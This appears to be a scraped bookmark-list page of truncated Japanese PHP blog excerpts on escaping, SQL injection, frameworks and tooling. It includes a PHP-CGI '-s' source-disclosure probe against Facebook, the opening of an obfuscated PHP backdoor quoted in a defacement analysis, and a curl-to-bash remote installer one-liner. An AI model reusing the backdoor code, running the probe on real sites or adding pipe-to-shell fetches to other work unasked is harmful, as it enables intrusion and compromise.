PHP で h() を書くなら一緒に echo しよう。 - こせきの技術日記
名前が長い関数 htmlspecialchars() を h() と書けるようにすると便利、という話がある。 PHP: htmlspecialchars - Manual htmlspecialchars関数を簡単に扱えるようにする 第1回 CakePHPを使いたくなる5つの特徴:CakePHPで高速Webアプリ開発|gihyo.jp … 技術評論社 htmlspecialchars() なんて長い名前は絶対忘れるし、ENT_QUOTESだのUTF-8だのも書き忘れるに決まっている。 h() は CakePHP でも使われていて、いいと思う。いいと思うんだけど、もうちょっといける。 <?php /** 改善前のエスケープ関数 */ function h($str) { return htmlspecialchars($str, ENT_QUOTES, 'UTF-8') } このようにエスケ
nakano_neko, 画像の右側が外注さんに頼んだソースコード。左側が僕が書きなおしたソースコード。...
画像の右側が外注さんに頼んだソースコード。左側が僕が書きなおしたソースコード。 仕事をお願いしたのに、自分で修正するのって本当にバカバカしい。 そういうプログラムにお金を払うって本当にバカバカしくて涙がでてくる。 facebookに書いた文章なんだけど、ちょっと加筆して、tumblrに公開してみる。 外注さんを探す時の参考にしてもらえれば幸い。 作業が重なると自分のトコだけで捌けなくなる時が時々あるので、外注さんを増やす努力をしてる。 んで、先日・・・ ネット上で「プログラム組みます」的なセールスをしていた個人に仕事をお願いした。 ただ、最初から雲行きが怪しかった… 屋号を名乗るだけで個人名は開示しない、 こちらの名前は間違えたまま、指摘しても謝罪も無し・・・ ちょっと怪しい臭いはしたんだけど、技術には自信があるようなので簡単な仕事をお願いすることに。 まず、お見積りをお願いする。 お見積
PHP で「Login with Facebook」を実装する基本的な方法まとめ
Facebook は Login with Facebook という機能を提供してくれてて 手元のウェブサービスに Facebook を使ってログインすることができますね。 日本語表示だと「Facebook でログイン」というやつ。 本家から便利なツールも提供されていて かなり簡単に使えるようになってるんだけど、 最初は少し戸惑うかもしれないので使い方をまとめておきます。 やり方もできることもいっぱいあると思いますが 簡単だと思われるやり方と、最も基本的な機能を中心に。 やりたいこと ウェブサービスのページ上にこういうボタンか 専用のボタンまたはリンクが表示されていて ユーザーがこれをクリックするといったん Facebook に飛び そこで承認ボタンを押したら元のページに帰ってきて その時点でウェブサービスがユーザーの ID や名前などを取得できるというの。 以下、手順です。 Facebo
SQLインジェクションについてのスライドを作成した - Kentaro Kuribayashi's blog
社内で、SQLインジェクションについてあらためて原理・原則から議論したいねという風潮がにわかに起こったので、ひとまずは叩き台として僕の方でまとめて皆で議論しましょうというわけで、以下のような資料を作成した。 社内勉強会用の資料なのだけど、僕は別にセキュリティに詳しいわけでもないし、ましてやPHPのことは素人なので、外部の識者にレビューしていただいて、できるだけ正しい知識に基づいて議論できればと思い、まずスライドを先行公開することにした。そうしたところ、Twitter上で多数の識者よりいろいろとご指摘いただいて、少くとも決定的におかしな内容にはなっていないものになったようだ。ありがとうございます。 僕らの職務のひとつに「セキュリティ関連」というものも謳われているので、そのあたりの知識普及・基盤整備についても、仕事のひとつとして行っている。先にも書いた通り、僕自身がその点についてよく理解できて
「はじめてのフレームワークとしてのFuelPHP」書評 - なんたらノート第三期ベータ
ご無沙汰しております。ものっそ久しぶりに書きます。 著者様から献本頂いて、達人出版会発行の「はじめてのフレームワークとしてのFuelPHP」読みました。EPUBをダウンロードするやつです。 http://tatsu-zine.com/books/fuelphp1st ただのFuelPHPのテクニック本だと思ったら大間違い、FuelPHPはむしろPHPフレームワークのわかりやすい一例として取り上げましたという印象で、この本の本質は、今どきPHPで開発するってのは、これぐらいの基準ラインに乗ってるよ、というのが一気にわかる本でした。 自分のローカルホストにきっちり開発環境作る OSSコミュニティへのURLリンクをしっかり持つ 自分が使っているOSのコマンドラインを押さえよう どれぐらいWeb開発用語の知識を持つべきか体で知ろう フレームワークと呼ばれるものがおよそどんな機能を持つのか Webア
僅かな挙動の変化も重大な影響を与える話
江添亮 自由ソフトウェア主義者 C++ Evangelist C++標準化委員会の委員 ドワンゴ社員 C++11本を執筆した。 株式会社ドワンゴで働いている。 Mail:boostcpp@gmail.com Twitter:@EzoeRyou GitHub: https://github.com/EzoeRyou 江添亮のマストドン@EzoeRyou 筆者にブログのネタを提供するために、品物をアマゾンお気に入りリスト経由で送りたい場合: Amazon.co.jp: 江添亮: 江添のほしい物リスト 筆者にブログのネタを提供するために、直接に品物を送りたい場合、住所をメールで質問してください。 View my complete profile ► 2020 (31) ► December (2) ► November (2) ► September (2) ► August (4) ► Jul
.htaccess改ざんの件、続き | ZF-Exブログ
最近の投稿 けものフレンズ たつき監督降板に関わる幾つかの仮説と解釈 BEER STAND molto!!(大阪駅)訪問 MINOH BEER WAREHOUSE(大阪箕面市)訪問 ビアバール丸々(御徒町)訪問 B-PROJECT 第12話「BOYS BE AMBITIOUS!」感想 B-PROJECT 第10話「 BIRTHDAY」感想 Facebookのユーザデータ取得について備忘録 B-PROJECT 第9話「浮気なPLAY BOY」感想 カテゴリー php (126) javascript (8) linux (5) アニメ (179) ゲーム (16) 特撮 (27) その他 (25) 未分類 (3) 酒 (39) Twitter EDF6、文明崩壊から物語開始というのはかなりシナリオのパターン変えてきてるので、今までの「地球側がどんどん劣勢に押し込まれてたのに敵の総大将が焦れて
Home - Twig - The flexible, fast, and secure PHP template engine
The flexible, fast, and secure template engine for PHP Twig is a modern template engine for PHP Fast: Twig compiles templates down to plain optimized PHP code. The overhead compared to regular PHP code was reduced to the very minimum. Secure: Twig has a sandbox mode to evaluate untrusted template code. This allows Twig to be used as a template language for applications where users may modify the t
The end of Silex (Symfony Blog)
Services Platform.sh for Symfony Best platform to deploy Symfony apps SymfonyInsight Automatic quality checks for your apps Symfony Certification Prove your knowledge and boost your career SensioLabs Professional services to help you with Symfony Blackfire Profile and monitor performance of your apps What about Silex in a Symfony 4 world? During the last few months, and as an exercise when working
ウェブサービスをゼロから作って成功したこと、失敗したこと - id:k-z-h
php, 雑記いつもなら寝ている時間なのだけれど、なぜか睡魔がやってこないので過去の思い出をまとめてみる。去年の2月ごろ、新規案件のウェブサービスに開発メンバーとしてアサインされた。作るべきものが大量にあったため、4チーム(工期中多少増減したが)に分けてドメインごとに作業分担をした。そのうち、ウェブアプリケーション本体(フロント、API、マネージツール)を担当するチームのサブリーダーが自分の役割だった。そのプロジェクトは去年の末に一旦の区切りを迎え、自分はそこで退職し、新たな環境に身を置くことにした。それから丸4ヶ月経って、自分が書いたコードと新しい環境で書かれていたコードを見比べて、思うところが多々ある。それらを文章としてまとめたいと思う。 失敗したこと簡単な骨組みを作ったあと、デプロイの仕組みを作った。php には phar という仕組みがある。これは jar/war のようにウェブサ
Macで一番簡単にPHP5.4をインストールする方法
Mac OS X に PHP5.4 を簡単に入れる方法です。 PHP5.4 使っていますか? 5.4 で実装されたビルトインサーバや traits、short array syntax などの新機能を試してみたい!でも 5.4 をインストールするのが面倒だなあ、というあなた、朗報です。 「PHP 5.3/5.4 for OS X 10.6/10.7 as binary package」というパッケージを使うと、簡単に PHP5.4 をインストールできます。 PHP5.4をインストール 方法は簡単。下記のコマンドを実行するだけです。 $ curl -s http://php-osx.liip.ch/install.sh | bash -s 5.4 実行するとパッケージのダウンロードが始まりますので、しばらく待ちます。インストール処理で sudo を使っているので、パスワードが求められる場合が
facebookにPHP CGIの脆弱性を試してみたら面白い対策がされていた!! - cakephperの日記(CakePHP, Laravel, PHP)
PHPに新たな脆弱性が見つかって、CGIモードで動作するPHPの場合コマンドライン引数がHTTP経由で渡せてしまうため、-sオプションを渡すとPHPのソースコードが丸見えになるというのが話題になってます。(-sオプションはhtmlでシンタックスハイライトまでしてくれてコードが見やすくなる) そこでFacebookに向けてこれを試してみると・・・ https://www.facebook.com/?-s こんな情報が!! <?php include_once 'https://www.facebook.com/careers/department?dept=engineering&req=a2KA0000000Lt8LMAS'; このURLにアクセスすると、セキュリティエンジニアの求人情報ページに行きます :) おしゃれー
5分でできるPHPセキュリティ対策 - ぼくはまちちゃん!
こんにちはこんにちは!! Webプログラミングしてますか! よく「PHPはセキュリティがダメ」とか言われてるよね。 でもそれって、べつにPHPが悪いんじゃなくて、 たぶん、セキュリティとかが、まだよくわからない人が多いだけなんじゃないかな。 がんばって勉強しようと思っても、なんだか難しい理屈が並んでいたりするしね…。 なので今日は、セキュリティ対策について、 「これだけやっとけば、わりと安全になるよ」ってことを、初心者むけに、大雑把に書いてみます! 理屈がわからなくても、最初はコピペでも、 なにもやらないより、やったほうがきっとマシになる! 1. XSS対策 動的なものを表示するとき、全部エスケープすればokです! (NG) あなたの名前は <?= $name ?> ですね! ↓ (OK) あなたの名前は <?= htmlspecialchars($name, ENT_QUOTES) ?>
PHPは◯◯◯である | quipped
本当にPHPについて知りたい人は、別のところに行くことをすすめる。moriyoshiさんのスライドや、Lerdorfオジサンのページなんかがオススメ。 PHPは歯ブラシである PHPの発案者であるRasmus Lerdorf氏はこう言っている。 PHPは歯ブラシくらい興奮に値する。シンプルで、毎日使う便利な道具。だからどうした。歯ブラシについて書物を漁るやつがいるか? PHP is about as exciting as your toothbrush. You use it every day, it does the job, it is a simple tool, so what? Who would want to read about toothbrushes? PHPが他の言語と決定的に違うのは、作者およびコミュニティが、言語に対して道具以上の感情を抱いてないことだ。PHP
初献本!パーフェクトPHP(^_^) | quipped
先日、以下のようにツイートしたところ てか誰かパーフェクトPHP譲ってください。きちんと書評を書きます。 — kt (@__kiyoto__) January 25, 2012 なんと作者の1人である@sotarokさんが、献本してくださった。まことにありがたいことである。一応通読したので、書評を書こうと思う。 月並みな表現になってしまうが、良書である。ぼくの中で、良書と言えるものに共通しているのは、どんなバックグラウンドの人でも何か学ぶことがあるということだ。例えば、ぼくはプログラミングそのものは丸3年やっているが、PHPに関しては、昨年の4月から仕事で使うようになってからであるし、いわゆるウェブプログラミングに関しても、昨年まではド素人だった(今でもそんなに知っているわけではないが)。そんな僕にとっては、序盤の文法のおさらいの部分は、軽い復習だったが、真ん中部分の、ウェブフレームワーク
そらいさんのサイトが改竄されたそうなので解析してみた
そらいさんのサービスが改ざん被害にあったとのことで、攻撃コードが載っていたので解析して見ました。 ということで、上記のコードを解析しましたが、難読化の仕組みは単純なのですが、コードを追いかけるのに中々疲れましたww 問題のコード問題のコードはこれです。 <?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) { $eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8h1Rn1XULdmbqxGU7h1Rn1XULdmbqZVUzElNmNTVGxEeNt1ZzkFcmJyJuUTNyZGJuciLxk2cwRCLiICKuVHdlJHJn4SNykmckRiLnsTKn4iInIiL
PHPUnit テストケースで書き換えた値を復帰する
PHPUnitのテストケースで書き換えた値の復帰について。 テストケースでテストを記述する際に、スーパーグローバルやクラス変数を書き換えることがあるのですが、これらの値を書き換えたまま、別のテストを実行すると書き換えられた状態でテストが実行されるので、それらの値に依存した処理があるとテストが通らないことがあります。 PHPUnitでは、そういったテストをまたがって影響を及ぼすであろう値の保存、復帰を自動で行なってくれる機能があります。 スーパーグローバル デフォルトでは、各テストメソッドを実行する前に、スーパーグローバル変数($_ENV, $_POST, $_GET, $_COOKIE, $_SERVER, $_FILES, $_REQUEST)の値をが保存されており、テストメソッド終了後にそれらの値がスーパーグローバル変数へ復帰されます。 これらの処理はsetUp()/tearDown(
これはいい!設置するだけでWebサイトを高速化·FastPage MOONGIFT
FastPageは静的サイトを対象にしたWebサイト高速化ソフトウェアです。 Googleはページの表示速度を検索順位の要素に盛り込むようになっています。そうでなかったとしてもページが高速に表示されるのは良いことです。そこで既存のサイト構成そのままにサイトを高速化するFastPageを使ってみましょう。 ファイル構成です。 例えば実行したイメージです。普通にファイルの内容が返ってきますが、実際にはキャッシュが使われています。 FastPageではファイルサイズの小さい画像をHTML/CSS内にインラインで展開したり、JavaScriptもサイズが小さければHTML内で展開します。さらにファイルもGzipで圧縮して転送量を小さくする、キャッシュ(サーバサイド、クライアントサイド)の利用などの施策がとられています。 なお商用版ではAmazon S3やWindows Azureを使ったCDN配信
PHP Advent Calendar jp 2011 まとめ
PHPer の年末を彩る PHP Advent Calendar jp 2011 が今年も無事に終了しました。 今年は12/1から12/26まで、全26回に渡って全国の PHPer が PHP に関するエントリを投稿しました。今年は見事に登板日を超す人もいなくて、無事に完走できました。(焼肉奢りの人はいませんでした><)参加された皆さんお疲れ様でした! エントリ内容 今年もPHP言語についてやライブラリ、フレームワークなど多岐に渡る内容が投稿されました。昨年も様々な記事がありましたが、あえて違いをあげるなら PHP5.4 に関する記事が登場したことでしょうか。 PHP 関連では 5.4 や各フレームワークなど内容を絞った Advent Calendar も開催されていたので、PHP Advent Calendar jp については、普段 PHP を使っていて気になること、つまづいたところ、
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
Blogger